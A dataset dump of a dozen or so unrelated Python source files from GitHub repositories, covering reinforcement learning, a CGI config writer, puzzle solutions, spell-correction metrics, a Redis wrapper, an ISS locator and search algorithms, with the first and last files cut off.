output_units = env.action_space.n\n\ninput_shape = env.observation_space.shape[0]\nNUM_INPUT_FEATURES = 4\nx = tf.placeholder(tf.float32, shape=(None, NUM_INPUT_FEATURES), name='x')\ny = tf.placeholder(tf.float32, shape=(None, output_units), name='y')\n\nout = fully_connected(inputs=x,\n num_outputs=output_units,\n activation_fn=tf.nn.softmax,\n weights_initializer=w_init,\n weights_regularizer=None,\n biases_initializer=b_init,\n scope='fc')\n\nall_vars = tf.global_variables()\n\npi = tf.contrib.distributions.Bernoulli(p=out, name='pi')\npi_sample = pi.sample()\nlog_pi = pi.log_prob(y, name='log_pi')\n\nReturns = tf.placeholder(tf.float32, name='Returns')\noptimizer = tf.train.GradientDescentOptimizer(alpha)\ntrain_op = optimizer.minimize(-1.0 * Returns * log_pi)\n\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\nMEMORY = 25\nMAX_STEPS = env.spec.tags.get('wrapper_config.TimeLimit.max_episode_steps')\n\n\ntrack_steps = []\ntrack_returns = []\n\n# For LaTeX plotting\nw1_plot = ''\nw2_plot = ''\nw3_plot = ''\nw4_plot = ''\nw5_plot = ''\nw6_plot = ''\nw7_plot = ''\nw8_plot = ''\nreturns_plot = ''\nsteps_plot = ''\n\nfor ep in range(2001):\n obs = env.reset()\n\n G = 0\n ep_states = []\n ep_actions = []\n ep_rewards = [0]\n done = False\n t = 0\n I = 1\n while not done:\n ep_states.append(obs)\n env.render()\n action = sess.run([pi_sample], feed_dict={x: [obs]})[0][0]\n ep_actions.append(action)\n obs, reward, done, info = env.step(action[0])\n ep_rewards.append(reward * I)\n G += reward * I\n I *= gamma\n\n t += 1\n if t >= MAX_STEPS:\n break\n\n returns = np.array([G - np.cumsum(ep_rewards[:-1])]).T\n index = ep % MEMORY\n\n print(np.array(ep_states))\n\n _ = sess.run([train_op], feed_dict={x: np.array(ep_states),\n y: np.array(ep_actions),\n Returns: returns})\n\n track_steps.append(t)\n track_steps = track_steps[-MEMORY:]\n mean_steps = np.mean(track_steps)\n\n track_returns.append(G)\n track_returns = track_returns[-MEMORY:]\n mean_return = np.mean(track_returns)\n\n print(\"Episode {} finished after {} steps with return {}\".format(ep, t, G))\n print(\"Mean return over the last {} episodes is {}\".format(MEMORY, mean_return))\n print(\"Mean number of steps over the last {} episodes is {}\".format(MEMORY, mean_steps))\n\n with tf.variable_scope('fc', reuse=True):\n weights = sess.run(tf.get_variable('weights'))\n print(\"Weights:\")\n print(weights)\n\n if ep % 20 == 0:\n w1_plot += str((ep, weights[0, 0]))\n w2_plot += str((ep, weights[0, 1]))\n w3_plot += str((ep, weights[1, 0]))\n w4_plot += str((ep, weights[1, 1]))\n w5_plot += str((ep, weights[2, 0]))\n w6_plot += str((ep, weights[2, 1]))\n w7_plot += str((ep, weights[3, 0]))\n w8_plot += str((ep, weights[3, 1]))\n returns_plot += str((ep, mean_return))\n steps_plot += str((ep, mean_steps))\n\nprint('w1:', w1_plot)\nprint('w2:', w2_plot)\nprint('w3:', w3_plot)\nprint('w4:', w4_plot)\nprint('w5:', w5_plot)\nprint('w6:', w6_plot)\nprint('w7:', w7_plot)\nprint('w8:', w8_plot)\nprint('returns:', returns_plot)\nprint('steps:', steps_plot)\n\nsess.close()\n","repo_name":"azmsu/reinforcement-learning","sub_path":"cartpole-reinforce.py","file_name":"cartpole-reinforce.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"22802606247","text":"#!../python35/python.exe\nprint (\"Content-type: text/html\\n\")\nimport cgi\nimport cgitb; cgitb.enable()\nform = cgi.FieldStorage()\nnombre = form.getfirst(\"nombre\");\ndificuldad = form.getfirst(\"dificuldad\");\npocision = form.getfirst(\"pocision\");\nelementos = form.getfirst(\"elementos\");\nreloj = form.getfirst(\"reloj\");\ntiempo_juego = form.getfirst(\"tiempo_juego\");\ntiempo_jugada = form.getfirst(\"tiempo_jugada\");\ntiempo_multinivel = form.getfirst(\"tiempo_multinivel\");\n\n\ncolor = form.getfirst(\"fcolor\");\n\n\nconfig = open(\"datos/config.dat\",\"w\")\n\nconfig.write(nombre+\",\"+dificuldad+\",\"+pocision+\",\"+elementos+\",\"+reloj+\",\"+tiempo_jugada+\",\"+tiempo_juego+\",\"+tiempo_multinivel+\",\"+color)\n\nprint('''''')","repo_name":"cecilianogranados96/Proyecto-Iphone","sub_path":"MasterMind/process_config.py","file_name":"process_config.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"44309123973","text":"### this script convert a config.dat file to produce output files 'mycal.in' and 'radius.dat'.\n\nimport numpy as np\nimport pandas as pd\n\ndf=pd.read_csv('config.dat',header=None,skiprows=0)\n\nradius=df.iloc[0].tolist()[0].split()[-3]\n\nf=open('radius.dat','w')\nf.write(str(radius+'\\n'))\nf.close()\n\nf=open('mycal.in','w')\nf.write('** total number of varaibles'+'\\n')\nf.write('** data begins from line 27 and onwards'+'\\n')\nf.write('** the rest are all dummies'+'\\n')\n\nfor i in range(4,27):\n f.write('**'+'\\n')\n \ncount=0 \nfor i in range(len(df)):\n line=df.iloc[i].tolist()[0]\n x=line.split()[0]\n y=line.split()[1]\n z=line.split()[2]\n count=count+1;\n state='variable '+ str(count) + ' ' + x\n #print(state)\n f.write(state+'\\n')\n \n count=count+1;\n #print(count,y);\n state='variable '+ str(count) + ' ' + y\n #print(state)\n f.write(state+'\\n')\n \n count=count+1\n #print(count,z);\n state='variable '+ str(count) + ' ' + z\n #print(state)\n f.write(state+'\\n')\nf.write('end'+'\\n')\t\nf.close()\n \n\n","repo_name":"tlyoon/mock-data-generation","sub_path":"convert_config.dat2mycal.in.py","file_name":"convert_config.dat2mycal.in.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39617524529","text":"from prelogging import LCDict\nimport logging\n\nKEYWORD = 'my_keyword'\n\n# \"class formatter\"\n\nclass MyFormatter(logging.Formatter):\n def __init__(self, **kwargs):\n self.value=kwargs.pop(KEYWORD, '')\n kwargs.pop('class', None)\n s = super(MyFormatter, self).__init__(**kwargs)\n\n def format(self, logrecord, *args, **kwds):\n message = super(MyFormatter, self).format(logrecord, *args, **kwds)\n return 'MyFormatter [%r: %r] says: %s' % (KEYWORD, self.value, message)\n\n\nif __name__ == '__main__':\n lcd = LCDict(attach_handlers_to_root=True)\n lcd.add_formatter( 'my_formatter',\n format='%(name)s - %(levelname)s - %(message)s',\n # dateformat=...,\n # style=?,\n ** {'()': MyFormatter,\n KEYWORD: 'my_value'} )\n lcd.add_stdout_handler('out', formatter='my_formatter')\n lcd.config()\n\n root = logging.getLogger()\n root.debug(\"Debug.\")\n root.info(\"Info.\")\n root.warning(\"Warning.\")\n root.error(\"Error.\")\n root.critical(\"Critical.\")\n \"\"\"\n MyFormatter ['my_keyword': 'my_value'] says: root - WARNING - Warning.\n MyFormatter ['my_keyword': 'my_value'] says: root - ERROR - Error.\n MyFormatter ['my_keyword': 'my_value'] says: root - CRITICAL - Critical.\n \"\"\"\n","repo_name":"Twangist/prelogging","sub_path":"examples/custom_class_formatter.py","file_name":"custom_class_formatter.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"35"} +{"seq_id":"42465381709","text":"import sys\n\ndef candies(n, arr):\n # Complete this function\n candies = [1]*n\n # forward check\n for i in range(1, len(arr)):\n # determine candies[i] by comparison\n if arr[i] > arr[i-1]:\n candies[i] = candies[i-1] + 1\n # backward check\n for j in range(len(arr)-2, -1, -1):\n if arr[j] > arr[j+1] and candies[j] <= candies[j+1]:\n candies[j] = candies[j+1] + 1\n \n return sum(candies)\n\nif __name__ == \"__main__\":\n n = int(input().strip())\n arr = []\n arr_i = 0\n for arr_i in range(n):\n arr_t = int(input().strip())\n arr.append(arr_t)\n result = candies(n, arr)\n print(result)","repo_name":"seLain/codesnippets","sub_path":"python3/hackerrank_leetcode/candies/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72356709222","text":"# coding=utf-8\n#!/usr/bin/python3\n\n''' Measure metrics (5 tests average) from spellcorrector.py, with several operation modes\n\nIndicates several metrics (avarage) for each operation mode (\"Manual\", Aspell, Hunspell and\nSymspell):\n * True Positives Wrong\n * True Positives Right\n * True Negatives\n * False Positives\n * False Negatives\n * Accuracy\n * Precision\n * Recall\n * Harmonic Mean\n * True Positives Rate\n * False Positives Rate\n * Execution Duration (sec)\n'''\n\nimport sys\nimport time\nimport fileinput\n\nimport regex\nimport numpy as np\nfrom prettytable import PrettyTable\n\nimport spellcorrector\n\ndef is_word(token):\n \"Indicates if token is a `word`.\"\n return bool(regex.search(r'\\w+', token, flags=regex.UNICODE))\n\ndef process_token(token):\n \"Process token.\"\n if len(token) <= 3:\n n_changes = np.random.choice([0, 1], p=[3.0/4.0, 1.0/4.0])\n else:\n n_changes = np.random.choice([0, 1, 2], p=[3.0/4.0, 0.8/4.0, 0.2/4.0])\n\n changes = np.random.choice([1, 2, 3, 4], size=(n_changes))\n for change in changes:\n if change == 1: # delete\n if len(token) > 1:\n i_rand = np.random.randint(0, len(token))\n token = token[0:i_rand] + token[i_rand+1:]\n elif change == 2: # transposes (i <-> i+1)\n if len(token) > 1:\n i_rand = np.random.randint(0, len(token)-1)\n token = token[0:i_rand] + token[i_rand+1] + token[i_rand] + token[i_rand+2:]\n elif change == 3: # replaces\n i_rand = np.random.randint(0, len(token))\n new_char = np.random.choice(list('aáàãâbcçdeéèêfghiíìîjklmnoóòõôpqrstuúùûvwxyz' +\\\n 'AÁÀÃÂBCÇDEÉÈÊFGHIÍÌÎJKLMNOÓÒÕÔPQRSTUÚÙÛVWXYZ'))\n token = token[0:i_rand] + new_char + token[i_rand+1:]\n else: # inserts\n i_rand = np.random.randint(0, len(token))\n new_char = np.random.choice(list('aáàãâbcçdeéèêfghiíìîjklmnoóòõôpqrstuúùûvwxyz' +\\\n 'AÁÀÃÂBCÇDEÉÈÊFGHIÍÌÎJKLMNOÓÒÕÔPQRSTUÚÙÛVWXYZ'))\n token = token[0:i_rand] + new_char + token[i_rand:]\n return token\n\n\ndef gen_text_with_errors(tokens):\n \"Generate text with errors, from `tokens` list.\"\n errors_tokens = []\n for token in tokens:\n if is_word(token) and len(token) > 1:\n errors_tokens.append(process_token(token))\n else:\n errors_tokens.append(token)\n\n return ''.join(errors_tokens)\n\n\ndef classification(original_word, errors_word, corrected_word):\n \"Classify spell correction as TPW, TPR, TN, FP or FN.\"\n # True Positives\n if original_word != errors_word and errors_word != corrected_word:\n # Correção errada\n if original_word != corrected_word:\n return 'TPW'\n # Correção correta\n return 'TPR'\n # True Negatives\n if original_word == errors_word and errors_word == corrected_word:\n return 'TN'\n # False Positives\n if original_word == errors_word and errors_word != corrected_word:\n return 'FP'\n # False Negatives\n if original_word != errors_word and errors_word == corrected_word:\n return 'FN'\n return None\n\n\ndef get_wrong_texts(n_tests, original_tokens):\n \"Get `n_tests` texts with errors.\"\n wrong_texts = []\n with open('metrics_errors.txt', 'w+') as file_desc:\n for i in range(n_tests):\n errors_text = gen_text_with_errors(original_tokens)\n wrong_texts.append(errors_text)\n print(f'\\n-- TESTE {i} --', file=file_desc)\n print(errors_text, file=file_desc)\n return wrong_texts\n\n\ndef get_metrics(function_name, id_test, function, original_tokens, errors_text):\n \"Calculates metrics.\"\n errors_tokens = regex.findall(r'\\w+|\\s+|\\p{P}+', errors_text, flags=regex.UNICODE)\n\n # Corrigir erros do texto\n print(f'-- Correção dos erros do texto com função {function_name} - Teste {str(id_test)} --',\n file=sys.stderr)\n if function_name == 'Manual':\n time1 = time.time()\n pos_freq, words_freq = spellcorrector.analyze_large_text()\n time2 = time.time()\n corrected_text = spellcorrector.correct_text(pos_freq, words_freq,\n text_lines=errors_text.split('\\n'))\n time3 = time.time()\n duration = (time2-time1, time3-time2)\n else:\n time1 = time.time()\n corrected_text = spellcorrector.correct_text_ext(errors_text.split('\\n'), function)\n time2 = time.time()\n duration = time2-time1\n\n corrected_tokens = regex.findall(r'\\w+|\\s+|\\p{P}+', corrected_text, flags=regex.UNICODE)\n with open('metrics_corrected.txt', 'a+') as file_desc:\n print(f'\\n-- FUNÇÃO {function_name} - TESTE {id_test} --', file=file_desc)\n print(corrected_text, file=file_desc)\n\n # Calcular métricas\n print('-- Cálculo de métricas --', file=sys.stderr)\n true_positives_wrong_correction = 0 # Há erro e token é corrigido incorretamente\n true_positives_right_correction = 0 # Há erro e token é corrigido corretamente\n true_negatives = 0 # Não há erro e token mantém-se\n false_positives = 0 # Não há erro, mas token é corrigido\n false_negatives = 0 # Há erro, mas este não é corrigido\n total_words = 0\n\n for i, token in enumerate(original_tokens):\n if is_word(token) or is_word(errors_tokens[i]) or is_word(corrected_tokens[i]):\n total_words += 1\n classif = classification(token, errors_tokens[i], corrected_tokens[i])\n # True Positives, Correção errada\n if classif == 'TPW':\n true_positives_wrong_correction += 1\n # True Positives, Correção correta\n elif classif == 'TPR':\n true_positives_right_correction += 1\n # True Negatives\n elif classif == 'TN':\n true_negatives += 1\n # False Positives\n elif classif == 'FP':\n false_positives += 1\n # False Negatives\n elif classif == 'FN':\n false_negatives += 1\n\n return true_positives_wrong_correction, true_positives_right_correction, true_negatives, \\\n false_positives, false_negatives, total_words, duration\n\n\ndef run_tests(function_name, function, original_tokens, wrong_texts, n_tests):\n \"Run tests.\"\n true_positives_wrong_correction = 0 # Há erro e token é corrigido incorretamente\n true_positives_right_correction = 0 # Há erro e token é corrigido corretamente\n true_negatives = 0 # Não há erro e token mantém-se\n false_positives = 0 # Não há erro, mas token é corrigido\n false_negatives = 0 # Há erro, mas este não é corrigido\n total_words = 0\n duration = 0\n\n for i in range(0, n_tests):\n m_tpw, m_tpr, m_tn, m_fp, m_fn, m_tw, m_d = get_metrics(function_name, i, function,\n original_tokens, wrong_texts[i])\n true_positives_wrong_correction += m_tpw\n true_positives_right_correction += m_tpr\n true_negatives += m_tn\n false_positives += m_fp\n false_negatives += m_fn\n total_words += m_tw\n if isinstance(m_d, tuple):\n if i == 0:\n duration = [m_d[0], m_d[1]]\n else:\n duration[0] += m_d[0]\n duration[1] += m_d[1]\n else:\n duration += m_d\n\n true_positives_wrong_correction /= n_tests\n true_positives_right_correction /= n_tests\n true_negatives /= n_tests\n false_positives /= n_tests\n false_negatives /= n_tests\n total_words /= n_tests\n if isinstance(duration, list):\n duration[0] /= n_tests\n duration[1] /= n_tests\n else:\n duration /= n_tests\n\n true_positives = true_positives_right_correction + true_positives_wrong_correction\n\n if total_words > 0:\n accuracy = round((true_positives_right_correction + true_negatives) / total_words, 2)\n\n if true_positives + false_positives > 0:\n precision = round(true_positives_right_correction / (true_positives + false_positives),\n 2)\n else:\n precision = None\n\n if true_positives + false_negatives > 0:\n recall = round(true_positives_right_correction / (true_positives + false_negatives), 2)\n else:\n recall = None\n\n if precision and recall and precision + recall > 0:\n harmonic_mean = round(2 * ((precision * recall) / (precision + recall)), 2)\n else:\n harmonic_mean = None\n\n if true_positives + false_negatives > 0:\n true_positive_rate = round(true_positives_right_correction /\n (true_positives + false_negatives), 2)\n else:\n true_positive_rate = None\n\n if false_positives + true_negatives > 0:\n false_positive_rate = round(false_positives / (false_positives + true_negatives), 2)\n else:\n false_positive_rate = None\n else:\n accuracy = None\n precision = None\n recall = None\n harmonic_mean = None\n true_positive_rate = None\n false_positive_rate = None\n\n return true_positives_wrong_correction, true_positives_right_correction, true_negatives,\\\n false_positives, false_negatives, accuracy, precision, recall, harmonic_mean,\\\n true_positive_rate, false_positive_rate, duration\n\n\ndef main():\n \"Main function.\"\n # Ler texto correto\n print('-- Leitura do texto correto --', file=sys.stderr)\n original_text = ''.join([line for line in fileinput.input(sys.argv[1:])])\n original_tokens = regex.findall(r'\\w+|\\s+|\\p{P}+', original_text, flags=regex.UNICODE)\n\n print('-- Inserção de erros no texto original (5x) --', file=sys.stderr)\n wrong_texts = get_wrong_texts(5, original_tokens)\n\n # Gerar estrutura da tabela output\n table = PrettyTable()\n table.field_names = [\"Medidas\", \"Manual\", \"Aspell\", \"Hunspell\", \"Symspell\"]\n tpw_list = ['True Positives Wrong']\n tpr_list = ['True Positives Right']\n tn_list = ['True Negatives']\n fp_list = ['False Positives']\n fn_list = ['False Negatives']\n accuracy_list = ['Accuracy']\n precision_list = ['Precision']\n recall_list = ['Recall']\n hm_list = ['Harmonic Mean']\n tp_rate_list = ['TP Rate']\n fp_rate_list = ['FP Rate']\n d_list = ['Duration (sec)']\n\n m_tpw, m_tpr, m_tn, m_fp, m_fn, accuracy, precision, recall, h_mean, tp_rate, fp_rate, dur = \\\n run_tests('Manual', spellcorrector.correct_text, original_tokens, wrong_texts, 5)\n tpw_list.append(m_tpw)\n tpr_list.append(m_tpr)\n tn_list.append(m_tn)\n fp_list.append(m_fp)\n fn_list.append(m_fn)\n accuracy_list.append(accuracy)\n precision_list.append(precision)\n recall_list.append(recall)\n hm_list.append(h_mean)\n tp_rate_list.append(tp_rate)\n fp_rate_list.append(fp_rate)\n d_list.append(f'{round(dur[0],2)} + {round(dur[1],2)}')\n\n function_names = [\"Aspell\", \"Hunspell\", \"Symspell\"]\n functions = [spellcorrector.correct_line_aspell, spellcorrector.correct_line_hunspell,\n spellcorrector.correct_line_symspell]\n for i in range(0, 3):\n m_tpw, m_tpr, m_tn, m_fp, m_fn, accuracy, precision, recall, h_mean, tp_rate, fp_rate, \\\n dur = run_tests(function_names[i], functions[i], original_tokens, wrong_texts, 5)\n tpw_list.append(m_tpw)\n tpr_list.append(m_tpr)\n tn_list.append(m_tn)\n fp_list.append(m_fp)\n fn_list.append(m_fn)\n accuracy_list.append(accuracy)\n precision_list.append(precision)\n recall_list.append(recall)\n hm_list.append(h_mean)\n tp_rate_list.append(tp_rate)\n fp_rate_list.append(fp_rate)\n d_list.append(str(round(dur, 2)))\n\n table.add_row(tpw_list)\n table.add_row(tpr_list)\n table.add_row(tn_list)\n table.add_row(fp_list)\n table.add_row(fn_list)\n table.add_row(accuracy_list)\n table.add_row(precision_list)\n table.add_row(recall_list)\n table.add_row(hm_list)\n table.add_row(tp_rate_list)\n table.add_row(fp_rate_list)\n table.add_row(d_list)\n\n print(table)\n\n\nif __name__ == \"__main__\":\n main()\n\n__author__ = \"João Barreira, Mafalda Nunes\"\n__email__ = \"a73831@alunos.uminho.pt, a77364@alunos.uminho.pt\"\n","repo_name":"barreira/spln-1819","sub_path":"tp3/scripts/metrics_measure.py","file_name":"metrics_measure.py","file_ext":"py","file_size_in_byte":12532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6503734849","text":"import cs50\n\ndef checksum (c):\n card_length = 0\n first_two = 0\n \n ##other = even numbers, not odd ones!\n other_sum = 0\n nonother_sum = 0\n while c > 0: \n card_length+=1\n if card_length % 2 == 0 :\n if (c % 10 * 2) >= 10:\n other_sum += (c%10 * 2) + 1\n else:\n other_sum += (c%10 * 2)\n else:\n nonother_sum += (c%10)\n c=c//10 ##unlike in c, normal division would not round integer, since it would produce a float\n if c < 100 and c >=10:\n first_two = c\n \n if ((card_length != 13 and card_length is not 15 and card_length is not 16) or (((other_sum + nonother_sum) % 10) is not 0)):\n print(\"INVALID\\n\")\n \n else:\n if card_length == 15 or (first_two == 34 and first_two == 37):\n print (\"AMEX\\n\")\n elif (card_length == 16 and (51 <= first_two and first_two <= 55)):\n print (\"MASTERCARD\\n\")\n elif (card_length == 13 or card_length == 16) and (39 < first_two and first_two < 50):\n print (\"VISA\\n\")\n \ndef main():\n print (\"Input credit card number here: \", end=\"\")\n card_num = cs50.get_int() ##to take care of the possibility of user inputting a non-integer input\n checksum(card_num)\n \nif __name__ == '__main__':\n main()","repo_name":"NickSadjoli/cs50","sub_path":"pset6/credit.py","file_name":"credit.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31783682321","text":"__author__ = \"Cody Swain\"\n\nimport time\nimport math\n\n## TO DO ##\n# This algorithm is inefficient because it passes the whole array with each recursive pass.\n# Memory usage can be reduced simply using the indices with a while loop. \n\ndef binary_search_1d(arr):\n\t'''Binary search peak finding for a one dimensional array\n\tParameters\n\t----------\n\tarr : list\n\t\tList of numerical values with a peak.\n\t'''\n\n\t# Iteration metadata\n\tprint(\"Length: {len} \\t Array: {arr}\".format(arr=arr, len=len(arr)))\n\n\t# Algorithm Implementation\n\tn = len(arr)\n\tif n%2 == 0:\n\t\tmid_idx = int(n/2-1)\n\telse: \n\t\tmid_idx = int((n-1)/2)\n\tif arr[mid_idx] < arr[mid_idx-1]:\n\t\treturn binary_search(arr[:mid_idx])\n\telif arr[mid_idx] < arr[mid_idx+1]:\n\t\treturn binary_search(arr[mid_idx:])\n\telse: \n\t\tpeak = arr[mid_idx]\n\t\treturn peak\n\nif __name__ == \"__main__\":\n\t# Test Array\n\tarray = [1, 3, 5, 7, 9, 11, 13, 15, 17, 18, 16, 14, 12, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1]\n\t\n\t# Run binary search, and track runtime.\n\tprint(\"\\n\\nBinary search peak finding algorithm. \\n\")\n\tstart_time = time.time()\n\tpeak = binary_search(array)\n\tend_time = time.time()\n\tprint(\"\\nPeak found: {}\".format(peak))\n\tprint(\"Execution time: {}s\\n\\n\".format(end_time-start_time))","repo_name":"codyswain/Algorithms","sub_path":"binary_search_peak_finding.py","file_name":"binary_search_peak_finding.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16664513025","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom typing import Any\n\nfrom redis import AuthenticationError, Redis\n\nfrom httpfpt.common.log import log\nfrom httpfpt.core import get_conf\n\n\nclass RedisDB(Redis):\n def __init__(self) -> None:\n super().__init__(\n host=get_conf.REDIS_HOST,\n port=get_conf.REDIS_PORT,\n password=get_conf.REDIS_PASSWORD,\n db=get_conf.REDIS_DATABASE,\n socket_timeout=get_conf.REDIS_TIMEOUT,\n decode_responses=True, # 转码 utf-8\n )\n self.prefix = 'httpfpt'\n\n def init(self) -> None:\n try:\n self.ping()\n except TimeoutError:\n log.error('数据库 redis 连接超时')\n except AuthenticationError:\n log.error('数据库 redis 授权认证错误')\n except Exception as e:\n log.error(f'数据库 redis 连接异常: {e}')\n else:\n log.info('数据库 redis 连接成功')\n\n def get(self, key: Any, logging: bool = True) -> Any:\n \"\"\"\n 获取 redis 数据\n\n :param key:\n :param logging:\n :return:\n \"\"\"\n data = super().get(key)\n if not data:\n if logging:\n log.warning(f'获取 redis 数据 {key} 失败, 此数据不存在')\n return data\n\n def get_prefix(self, prefix: str) -> list:\n \"\"\"\n 获取 redis 符合前缀的数据\n\n :param prefix: key 前缀\n :return:\n \"\"\"\n data = []\n for key in self.scan_iter(match=f'{prefix}*'):\n value = super().get(key)\n if value:\n data.append(value)\n return data\n\n def rset(self, key: Any, value: Any, **kwargs) -> None:\n \"\"\"\n 重置设置 redis 数据\n\n :param key:\n :param value:\n :param kwargs:\n :return:\n \"\"\"\n if super().exists(key):\n self.delete(key)\n self.set(key, value, **kwargs)\n\n def delete_prefix(self, prefix: str) -> None:\n \"\"\"\n 删除 redis 符合前缀的数据\n\n :param prefix: key 前缀\n :return:\n \"\"\"\n for key in self.scan_iter(match=f'{prefix}*'):\n self.delete(key)\n\n\nredis_client = RedisDB()\n","repo_name":"wu-clan/automated_api_pytest","sub_path":"httpfpt/db/redis_db.py","file_name":"redis_db.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} +{"seq_id":"4803918437","text":"from urllib.request import urlopen\nimport json\nfrom datetime import datetime\nfrom geopy.geocoders import Nominatim\n\niss_data = urlopen(\"http://api.open-notify.org/iss-now.json\") #Get data from API\n\niss_processed_data = json.loads(iss_data.read()) #Load data\n\ngeolocator = Nominatim(user_agent=\"Adam Khan's ISS Locator\") #Variable for calling Reverse Geocoding API\nlatAndLong = iss_processed_data['iss_position']['latitude'] + \", \" + iss_processed_data['iss_position']['longitude'] #Get Latitude and Longitude values for printing\nlatAndLong_no_space = iss_processed_data['iss_position']['latitude'] + \",\" + iss_processed_data['iss_position']['longitude'] #Latitude and Longitude for Google Maps link\n\nmaps_link = \"https://www.google.com/maps/search/?api=1&query=\" + latAndLong_no_space #Google Maps Link\ntry: #Try block works if there is an address (when ISS is over land)\n location = geolocator.reverse(latAndLong)\n print (\"The International Space Station is currently above: \", location.address)\n print (\"Latitude: \", iss_processed_data['iss_position']['latitude'])\n print (\"Longitude: \", iss_processed_data['iss_position']['longitude'])\n print (\"Check out the current location on Google Maps: \", maps_link)\nexcept: #Except block is called when address can not be found\n print (\"The International Space Station is currently over the ocean\")\n print (\"Latitude: \", iss_processed_data['iss_position']['latitude'])\n print (\"Longitude: \", iss_processed_data['iss_position']['longitude'])\n print (\"Check out the current location on Google Maps: \", maps_link)","repo_name":"notadamkhan/Python-ISS-Finder","sub_path":"ISSfinder.py","file_name":"ISSfinder.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74870383780","text":"from heapq import heappop, heappush\nfrom typing import Dict, List, Tuple\n\n\ndef search(dct: Dict) -> List[Tuple[int, int]]:\n \"\"\"\n Solve the maze using uniform-cost search.\n\n Write your implementation below\n \"\"\"\n r, c = dct[\"rows\"], dct[\"cols\"]\n\n if not dct[\"goals\"]:\n return []\n\n x0, y0 = dct[\"start\"]\n map = [[0 for i in range(c)] for j in range(r)]\n\n # 0: walkable way 1: obstacles 3: goals\n for i, j in dct[\"goals\"]:\n map[i][j] = 3\n\n for i, j in dct[\"obstacles\"]:\n map[i][j] = 1\n\n # early goal check is used in the main loop\n # so start = goal case has to be checked here\n if map[x0][y0] == 3:\n return [(x0, y0)]\n\n # visited nodes stores their parent nodes in the map\n map[x0][y0] = None\n actions = [(1, 0), (0, 1), (-1, 0), (0, -1)]\n\n # heapq for frontier\n front = [(0, x0, y0)]\n\n def get_path(x: int, y: int) -> List[Tuple[int, int]]:\n path = [(x, y)]\n while map[x][y]:\n path.append(map[x][y])\n x, y = map[x][y]\n path.reverse()\n return path\n\n # when all actions have same cost, ucs is equivalent to bfs\n while front:\n co, cx, cy = heappop(front)\n for ax, ay in actions:\n x, y = cx + ax, cy + ay\n if x >= r or x < 0 or y >= c or y < 0:\n continue\n is_way = map[x][y] == 0\n is_goal = map[x][y] == 3\n if not is_way and not is_goal:\n continue\n map[x][y] = (cx, cy)\n if is_goal:\n return get_path(x, y)\n heappush(front, (co + 1, x, y))\n\n return []\n","repo_name":"IntrovertHedgehog/documents","sub_path":"study/computing/cs3243/Projects/Project 1/Code Templates/Pro1_1/A0219739N/ucs.py","file_name":"ucs.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29850715597","text":"import sys\nfrom itertools import combinations\n\ninput = sys.stdin.readline\n\nwhile True: # break가 나올 때까지\n l = list(map(int, input().split()))\n if l[0] == 0: # 반복문 break조건\n break\n else:\n s = l[1:]\n for i in combinations(s, 6): # 주어진 수 중 6개를 뽑는 조합\n i = list(i)\n print(*i)\n print( )","repo_name":"msio900/coding_test","sub_path":"acmicpc/6603/6603.py","file_name":"6603.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"26553692854","text":"#!/usr/bin/python\n##\n# Description: Implements 2d banana distribution\n##\nimport numpy as np\nfrom scipy.stats import multivariate_normal\nimport matplotlib.pyplot as plt\n\n\nclass Banana_2D(object):\n def __init__(self, mu1=0, mu2=0, sigma1=1, sigma2=1, rho=0.9, a=1.15, b=0.5):\n self.mu1 = mu1\n self.mu2 = mu2\n # cov params\n self.sigma1 = sigma1\n self.sigma2 = sigma2\n self.rho = rho\n # transform params\n self.a = a\n self.b = b\n # define gauss dist\n mean_vec = np.array([self.mu1, self.mu2])\n cov = np.array([[self.sigma1 ** 2.0, self.rho * (sigma1 * sigma2)], [self.rho * (sigma1 * sigma2), self.sigma2 ** 2.0]])\n self.rv_2d_normal = multivariate_normal(mean_vec, cov)\n\n def pdf(self, y1, y2):\n # transform coords\n x1_inv = y1 / self.a\n x2_inv = (y2 - self.b * (x1_inv ** 2.0 + self.a ** 2.0)) * self.a\n\n pos = np.dstack((x1_inv, x2_inv))\n # eval gauss pdf at tranformed coords\n return self.rv_2d_normal.pdf(pos)\n\n def ln_like(self, y):\n assert len(y) == 2\n return np.log(self.pdf(y[0], y[1]))\n\n def check_prob_lvl(self, y1, y2, pdf_lvl):\n return pdf_lvl < self.pdf(y1, y2)\n\n def transform(self, x1, x2):\n y1 = self.a * x1\n y2 = x2 / self.a + self.b * (x1 ** 2.0 + self.a ** 2.0)\n return y1, y2\n\n def inv_transform(self, y1, y2):\n x1_inv = y1 / self.a\n x2_inv = (y2 - self.b * (x1_inv ** 2.0 + self.a ** 2.0)) * self.a\n return x1_inv, x2_inv\n\n def rvs(self, n_samples):\n # sample from gauss\n samples = self.rv_2d_normal.rvs(size=n_samples)\n x1_sample, x2_sample = samples[:, 0], samples[:, 1]\n\n # move sample to transformed coords\n y1 